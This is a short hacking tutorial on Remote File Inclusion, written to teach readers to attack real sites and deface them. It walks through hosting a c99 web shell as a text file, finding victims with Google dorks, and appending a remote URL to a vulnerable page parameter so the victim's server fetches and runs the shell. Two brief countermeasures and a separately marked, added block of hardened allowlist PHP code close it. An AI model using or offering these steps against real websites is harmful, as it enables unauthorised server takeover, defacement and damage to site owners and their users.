RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom-coded/malicious file on a website or server using a script. The vulnerability exploits the poor validation checks in websites and can eventually lead to code execution on the server or code execution on the website (XSS attack using JavaScript). This time, I will be writing a simple tutorial on Remote File Inclusion, and by the end of the tutorial I suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability, and trust me, not all website hacking is about SQL injection. Using RFI you can literally deface websites, get access to the server and do almost anything (including gagging them out or beg.. well, that's an exaggeration, but I guess you get the idea :P). What makes it more dangerous is that you only need common sense and a basic knowledge of PHP to execute this one; some Bash might come in handy, as most servers today are hosted on Linux.
Before starting this tutorial, I would like to tell you about a piece of code called a shell. There are many shells available. Let's consider a shell known as the c99 shell. Download it from the Internet.
Now sign up for an account on any free web hosting site, say 110mb.com. Now sign in to your account, go to Filemanager, upload some files and then upload the c99 shell there. Now just log out and visit the URL of the shell you uploaded.
http://yourname.110mb.com/shell.php
and you will find that you can manage all your directories and files without logging in to your account, that is, without entering your password anywhere.
Note: Your account might be suspended after uploading such shells.
How to perform the attack?
Step 1. Upload a shell in text format to your web hosting site. That is, just copy the code of the shell, save it as a text file and upload it. Note down the complete path of your shell.
Step 2. Search for a vulnerable site using Google dorks, like:
inurl:index.php?id=
inurl:index.php?page=
You can also use automated tools for the same.
Step 3. Let's say you found a site like
http://www.victim.com/index.php?page=anything
Replace this URL with http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?
Your shell might have been uploaded to the server if the victim's site is vulnerable. Now you can do anything with the victim's site, or maybe even with other sites running on the same web server, by simply accessing your shell.
Possible countermeasures:
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini.
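The two countermeasures above, as an added example that is not part of the original post: the include pattern behind a ?page= parameter next to an allowlisted version. The page names, the pages/ directory and the resolve_page helper are assumptions made for illustration.

```php
<?php
// Added example, PHP 8+. Page names and the pages/ directory are assumed.

// VULNERABLE pattern behind URLs like index.php?page=...:
//   include($_GET['page']);
// With allow_url_include = On, PHP fetches and executes whatever the
// parameter points at, because the request controls the include path.

// HARDENED: the request only selects a key; the path comes from the server.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(mixed $requested): ?string
{
    // Reject arrays (index.php?page[]=x) and anything that is not an exact key.
    // URLs, wrappers (php://, data:) and ../ sequences can never match a key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

// Countermeasure 2 as a runtime check: refuse to serve if php.ini still
// permits remote includes (expected setting: allow_url_include = Off).
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; set it to Off in php.ini');
    http_response_code(500);
    exit;
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit('Page not found');
}

include $path;
```

Blacklisting "http://" in the parameter is not equivalent to the allowlist, since other stream wrappers and local paths would still reach include.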
This is just the basics of RFI & web defacement.
In my upcoming articles I'll post some advanced methods of defacement.
So stay in touch & keep reading.
Post your comments & feedback.
